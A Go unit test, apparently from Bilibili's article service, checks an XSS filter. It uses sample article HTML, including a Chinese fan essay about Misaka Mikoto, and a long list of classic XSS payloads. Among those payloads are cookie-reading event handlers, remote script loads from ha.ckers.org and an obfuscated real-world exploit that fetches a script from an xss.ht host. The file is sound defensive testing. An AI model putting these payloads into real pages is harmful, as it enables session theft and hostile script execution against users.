You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
136 lines
14 KiB
136 lines
14 KiB
package service |
|
|
|
import ( |
|
"html" |
|
"testing" |
|
|
|
. "github.com/smartystreets/goconvey/convey" |
|
) |
|
|
|
func xssCheck(content string) (ok bool) { |
|
return html.UnescapeString(xssFilter(content)) == html.UnescapeString(content) |
|
} |
|
|
|
func TestXssCheck(t *testing.T) { |
|
Convey("valids", t, func() { |
|
items := []string{ |
|
"<img src=\"//i0.hdslb.com/bfs/article/1d448e050cd09aca8d199cbc0900b3332360fa7f.jpg\" width=\"1274\" height=\"897\" data-size=\"208327\"/>", |
|
"<p><strong>“呐,你知道什么是超电磁炮吗?”</strong></p><p><br/></p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/4adb9255ada5b97061e610b682b8636764fe50ed.png\" class=\"cut-off-5\"/></figure><p><br/></p><p> 2004年4月10日,镰池和马所著轻小说《魔法禁书目录》第一卷正式发行,随着一发“超电磁炮”飒爽登场,御坂美琴第一次向世界宣示了自己的存在。在当时谁也没有料到,这个总是被男主叫成“哔哩哔哩妹”的茶色头发女孩,将会成为日本动漫史上最具人气的现象级角色之一。</p><p> 今天是5月2日,御坂美琴迎来了她的第15个生日,<span style=\"text-decoration:line-through;\">现实年龄正式超过设定年龄(笑)</span>,作为一个萌新粉丝,看到身边仍然有相当多的前辈喜欢着美琴,不禁感叹姐姐大人的魅力果真是非同一般呐。</p><p> 大家是从什么时候喜欢上美琴的呢?</p><p> 或许是被弹指发射硬币的英姿所震撼的时候,或许是被献身拯救妹妹的勇气所感动的时候,或许也是被傲娇脸孩子心的萌属性给圈粉……每个人心里的御坂美琴都不尽相同,但我们喜欢的都是同一个女孩,那个被我们亲切地称为“炮姐”的女孩子。</p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/1d448e050cd09aca8d199cbc0900b3332360fa7f.jpg\" width=\"1274\" height=\"897\" data-size=\"208327\"/><figcaption class=\"caption\" contenteditable=\"false\"></figcaption></figure><p> 这个女孩呐,有点小幼稚,但关键时刻却有着与超出年龄的成熟与可靠。她经常大大咧咧像个男孩,但内心深处却比谁都更加敏感细腻。她是很小的时候就愿意主动贡献DNA试图治疗病人的小天使,也是为拯救妹妹们不惜与整个学园都市为敌的姐姐大人。</p><p> 御坂美琴本可以做个没心没肺的大小姐。凭着仅有七人的level5之一的地位、靓丽的外貌、优渥的家境,她完全可以为所欲为。她的挚友佐天泪子在认识她之前也是这么想的:“这么优秀的学姐,性格肯定高傲又不讨喜吧?”但御坂美琴从来不认为自己有多特殊,她只是遵从内心理所当然的善意,做着每个温柔的人都会做的事。</p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/ff40ff7ed526171cfa6fd9a06b7b037707d96779.jpg\" width=\"702\" height=\"1248\" data-size=\"68550\"/><figcaption class=\"caption\" contenteditable=\"false\"></figcaption></figure><p> 因为理所当然的善意,她在了解到无能力者的痛苦之后,会发自内心地喊出满怀期待的鼓励;</p><p> 因为理所当然的善意,她在得知“绝对能力者进化计划”后,能毫不犹豫地挺身而出,无论自己与敌人相比是多么微不足道;</p><p> 因为理所当然的善意,她义无反顾地登上前往第三次世界大战战场的飞机,哪怕前方是未知祸福的道路;</p><p> 美琴她啊,不是什么高不可攀的女神,而是努力像你我一样平凡地生活着的小女孩。她只是遵从本心做自己认为正确的事,也恰好拥有能将那些天真愿望实现的力量,仅仅就是这样,一个并非伟大崇高而是理所当然的,仅此而已的故事。</p><p> 所以才会有那刷了许多年都不曾消失的“你指尖跃动的电光”。像御坂美琴这样拥有力量却从不滥用,地位高高在上却从不端架子,见过世界的黑暗却仍相信光明的女孩,又怎能不让人喜欢呢?</p><p><br/></p><p> 2004年,名为御坂美琴的女孩第一次与我们见面;</p><p> 2008年,《魔法禁书目录》动画化,那枚硬币第一次旋转着落在女孩的指尖;</p><p> 2009年,《某科学的超电磁炮》动画化,“only my railgun”的旋律点燃无数人的热血;</p><p> 2010年,mikufans改名为bilibili,这个以御坂美琴命名的小网站此时还名不见经传,几年后却已然成为二次元领域的庞然大物;</p><p> 2011年,御坂美琴当选世萌萌王,同时创下世萌迄今为止单次得票数量最多的记录;此后在各大萌战中所向披靡,截至目前俨然是获得萌王数量最多的角色;</p><p> ……</p><p> 2017年,御坂美琴当选萌王之王;</p><p> 2018年,炮姐的传说仍在继续。</p><p> 恕我擅自代表广大炮厨群体,在这里衷心地说上一句,当然是今天每一位炮厨都会说的话:</p><p> <strong> “美琴,生日快乐!”</strong></p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/c0b554fd8a6967973f45c72023833de435ba904f.jpg\" width=\"570\" height=\"797\" data-size=\"587725\"/><figcaption class=\"caption\" contenteditable=\"false\"></figcaption></figure><p> 姐姐大人,你的过去我已来不及参与,但未来的故事,还请让我和你一起书写。</p><p> 这是关于某位向往平凡却注定不凡的女孩,和她的粉丝们,年复一年传递着爱与勇气的,充满希望的故事。</p><p> 我们的故事。</p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/4adb9255ada5b97061e610b682b8636764fe50ed.png\" class=\"cut-off-5\"/></figure><p><br/></p><p>附录:</p><p>御坂美琴应援群生日祝贺视频:</p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/e8f843e8b5f5e5ad8e15b0f5ffca8c239c1a57f7.png\" width=\"1320\" height=\"188\" data-size=\"40354\" aid=\"22658381\" class=\"video-card nomal\" type=\"nomal\"/></figure><p>B站点击量最高炮姐信仰视频:</p><figure contenteditable=\"false\" class=\"img-box\"><img src=\"//i0.hdslb.com/bfs/article/0d3ddf326ab6075607637d8b46e495e829225b3f.png\" width=\"1320\" height=\"188\" data-size=\"37606\" aid=\"810872\" class=\"video-card nomal\" type=\"nomal\"/></figure><p>up认识姐姐大人的过程(打广告?_(:3」∠)_):</p><figure class=\"img-box\" contenteditable=\"false\"><img src=\"//i0.hdslb.com/bfs/article/8b5c8c4ac306259e0359e3e6744d515fe3c346c8.png\" width=\"1320\" height=\"224\" data-size=\"24204\" aid=\"118943\" class=\"article-card\" type=\"normal\"/></figure><p><br/></p>", |
|
"<a href=\"http://space.bilibili.com/11052822\">文/终路之零</a>", |
|
"<p>"</p>", |
|
} |
|
for _, con := range items { |
|
So(xssCheck(con), ShouldBeTrue) |
|
} |
|
}) |
|
Convey("invalids", t, func() { |
|
items := []string{ |
|
`<a onblur="alert(secret)" href="http://www.google.com">Google</a>`, |
|
`';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`, |
|
`'';!--"<XSS>=&{()}`, |
|
`0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"`, |
|
`<script/src=data:,alert()>`, |
|
`<marquee/onstart=alert()>`, |
|
`<video/poster/onerror=alert()>`, |
|
`<isindex/autofocus/onfocus=alert()>`, |
|
`<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>`, |
|
`<IMG SRC="javascript:alert('XSS');">`, |
|
`<IMG SRC=javascript:alert('XSS')>`, |
|
`<IMG SRC=JaVaScRiPt:alert('XSS')>`, |
|
`<IMG SRC=javascript:alert("XSS")>`, |
|
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", |
|
`<a onmouseover="alert(document.cookie)">xxs link</a>`, |
|
`<a onmouseover=alert(document.cookie)>xxs link</a>`, |
|
`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, |
|
`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, |
|
`<IMG SRC=# onmouseover="alert('xxs')">`, |
|
`<IMG SRC= onmouseover="alert('xxs')">`, |
|
`<IMG onmouseover="alert('xxs')">`, |
|
`<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>`, |
|
`<IMG SRC=javascript:alert(`, |
|
`<IMG SRC=javascript:a&`, |
|
`<IMG SRC=javascript:alert('XSS')>`, |
|
`<IMG SRC="jav ascript:alert('XSS');">`, |
|
`<IMG SRC="jav	ascript:alert('XSS');">`, |
|
`<IMG SRC="jav
ascript:alert('XSS');">`, |
|
`<IMG SRC="jav
ascript:alert('XSS');">`, |
|
`<IMG SRC="  javascript:alert('XSS');">`, |
|
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", |
|
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
`<<SCRIPT>alert("XSS");//<</SCRIPT>`, |
|
`<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >`, |
|
`<SCRIPT SRC=//ha.ckers.org/.j>`, |
|
`<IMG SRC="javascript:alert('XSS')"`, |
|
`<iframe src=http://ha.ckers.org/scriptlet.html <`, |
|
`</script><script>alert('XSS');</script>`, |
|
`</TITLE><SCRIPT>alert("XSS");</SCRIPT>`, |
|
`<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">`, |
|
`<BODY BACKGROUND="javascript:alert('XSS')">`, |
|
`<IMG DYNSRC="javascript:alert('XSS')">`, |
|
`<IMG LOWSRC="javascript:alert('XSS')">`, |
|
`<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>`, |
|
`<IMG SRC='vbscript:msgbox("XSS")'>`, |
|
`<IMG SRC="livescript:[code]">`, |
|
`<BODY ONLOAD=alert('XSS')>`, |
|
`<BGSOUND SRC="javascript:alert('XSS');">`, |
|
`<BR SIZE="&{alert('XSS')}">`, |
|
`<LINK REL="stylesheet" HREF="javascript:alert('XSS');">`, |
|
`<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">`, |
|
`<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>`, |
|
`<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">`, |
|
`<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>`, |
|
`<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>`, |
|
`<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">`, |
|
`exp/*<A STYLE='no\xss:noxss("*//*");`, |
|
`<STYLE TYPE="text/javascript">alert('XSS');</STYLE>`, |
|
`<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>`, |
|
`<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>`, |
|
`<XSS STYLE="xss:expression(alert('XSS'))">`, |
|
`<XSS STYLE="behavior: url(xss.htc);">`, |
|
`<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">`, |
|
`<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">`, |
|
`<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">`, |
|
`<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`, |
|
`<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>`, |
|
`<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>`, |
|
`<TABLE BACKGROUND="javascript:alert('XSS')">`, |
|
`<TABLE><TD BACKGROUND="javascript:alert('XSS')">`, |
|
`<DIV STYLE="background-image: url(javascript:alert('XSS'))">`, |
|
`<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">`, |
|
`<DIV STYLE="background-image: url(javascript:alert('XSS'))">`, |
|
`<DIV STYLE="width: expression(alert('XSS'));">`, |
|
`<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->`, |
|
`<BASE HREF="javascript:alert('XSS');//">`, |
|
`<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>`, |
|
`<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->`, |
|
`<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>`, |
|
`<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">`, |
|
`<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">`, |
|
`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, |
|
`<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
`<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
`<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
`<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
"<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", |
|
`<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, |
|
`<A HREF="http://66.102.7.147/">XSS</A>`, |
|
`0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"`, |
|
`veris-->group<svg/onload=alert(/XSS/)//`, |
|
`#"><img src=M onerror=alert('XSS');>`, |
|
`element[attribute='<img src=x onerror=alert('XSS');>`, |
|
`<w contenteditable id=x onfocus=alert()>`, |
|
`<svg/onload=%26%23097lert%26lpar;1337)>`, |
|
`<script>for((i)in(self))eval(i)(1)</script>`, |
|
`<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>`, |
|
`<sCR<script>iPt>alert(1)</SCr</script>IPt>`, |
|
`<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>`, |
|
// 上报的xss利用代码 |
|
`<svg/onload=$.globalEval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZW1tbW1tLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=',/*''*/)) style=\"display:none\">`, |
|
} |
|
for _, con := range items { |
|
So(xssCheck(con), ShouldBeFalse) |
|
} |
|
}) |
|
}
|
|
|